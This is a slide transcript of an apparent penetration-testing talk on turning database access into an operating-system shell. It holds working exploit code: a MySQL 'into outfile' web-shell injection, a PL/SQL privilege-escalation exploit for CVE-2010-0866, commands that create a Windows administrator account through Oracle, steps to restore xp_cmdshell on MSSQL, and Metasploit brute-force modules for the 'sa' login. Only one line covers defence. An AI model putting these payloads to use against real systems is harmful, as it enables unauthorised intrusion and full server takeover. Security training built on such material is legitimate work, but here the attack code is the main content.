rock'n roll in database s
TRANSCRIPT
Rock'n Roll in Database Security
Prathan Phongthiproek (Lucifer@CITEC)Senior Information Security Consultant
ACIS Professional Center
Who am I ?
CITEC Evolution Code Name “Lucifer”, Moderator, Speaker Instructor: Web Application (In) Security 101 Instructor: Mastering in Exploitation
ACIS Professional Center Red Team : Penetration Tester Instructor / Speaker Security Consultant / Researcher
Founder of CWH Underground Hacker Exploits, Vulnerabilities, Papers Disclosure
Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc http://www.exploit-db.com/author/?a=1275
Let’s Talk !?
“Get DBA privilege is good but get SHELL is better !!”
MySQL PWNED !! From Web Application to get SHELL
Oracle Escalating Privilege XPL For get SHELL
MSSQL Credentials Attack For get SHELL
MSSQL and Oracle Vulnerabilities
2002 2003 2004 2005 2006 2007 2008 20090
40
80
120
160
24
30 0 0 0
11
0
46
12
25
61
144
4148
36
SQL Server Oracle
MySQL Jump into OS
MySQL5.x Vulnerability, 0-Day on Immunity CANVAS
SQL Injection via Web Application (Top Hit !!) MySQL Outfile Function
Need writable directory Need Absolute path Need Magic_quote off Union select 1,‘code’,3,4 into outfile
“/www/htdocs/shell.php” MySQL Load_file Function (Better !!)
Need Absolute path Need phpMyAdmin path or MySQL 3306 was opened at
firewall Union select 1,load_file(0x4332…………)
MySQL PWNED !! From Web Application to get SHELL
Oracle Escalating Privilege XPL For get SHELL – PL/SQL Injection
Dbms_cdc_publish3 – For Oracle 10gR1-11gR2
Dbms_cdc_publish2
Dbms_cdc_publish
Dbms_metadata_open
Dbms_export_extension
It_findricset_cursor
It_compressworkspace
It_mergeworkspace
It_removeworkspace
It_rollbackworkspace
Oracle Escalating Privilege XPL For get SHELL
DBMS_JVM_EXP_PERMS package that allow any user create privilege to grant themselves java IO Privileges
CVE-2010-0866
Affect Oracle 10g-11g (Windows Only)
Defense Apply October 2010 Critical Patch Update Oracle 11gR2 on Windows still secure Revoke privileges from users to execute
DBMS_JVM_EXP_PERMS
Oracle Escalating Privilege XPL For get SHELL
XPL Code (Grant JAVA IO Privilege)
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission',’<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
Oracle Escalating Privilege XPL For get SHELL
XPL Code (OS Execute)
select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ’net user prathan 1234 /add’) from dual;
select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ’net localgroup administrators prathan /add’) from dual;
Oracle Escalating Privilege XPL For get SHELL
MSSQL Credentials Attack For get SHELL
‘SA’ is God Account, Run with SYSTEM Privilege on Windows
Default ‘sa’ password is blank password or guessable
Require “xp_cmdshell” stored procedures (Disable by default on MSSQL 2005+)
Enabled it with osql On MSSQL 2005
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE
EXEC sp_configure ‘xp_cmdshell’, 1
RECONFIGURE
MSSQL Credentials Attack For get SHELL
On MSSQL 2000 Xp_cmdshell was drop by sp_dropextendedproc
EXEC sp_addextendedproc ‘xp_anyname’, ‘xp_log70.dll’ CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
MSSQL Credentials Attack For get SHELL
Brute-Force ‘sa’ password and use sa credentials to run os command on target machine with Metasploit modules Scanner/mssql/mssql_ping Scanner/mssql/mssql_login Admin/mssql/mssql_exec Windows/smb/psexec
IPWN4 – PenTest Tools (Jail-Broken)
Pen-Test Tools (Command-line) Metasploit Framework Social Engineering Toolkit Nmap Scanner, Amap, Hping Nbtscan, netcat Nikto2, dnsmap Ettercap-NG, Aircrack-NG
GUI Tools iTeleport Jaadu RDP iNet WiFiFoFum
Full Compromise MSSQL via Iphone4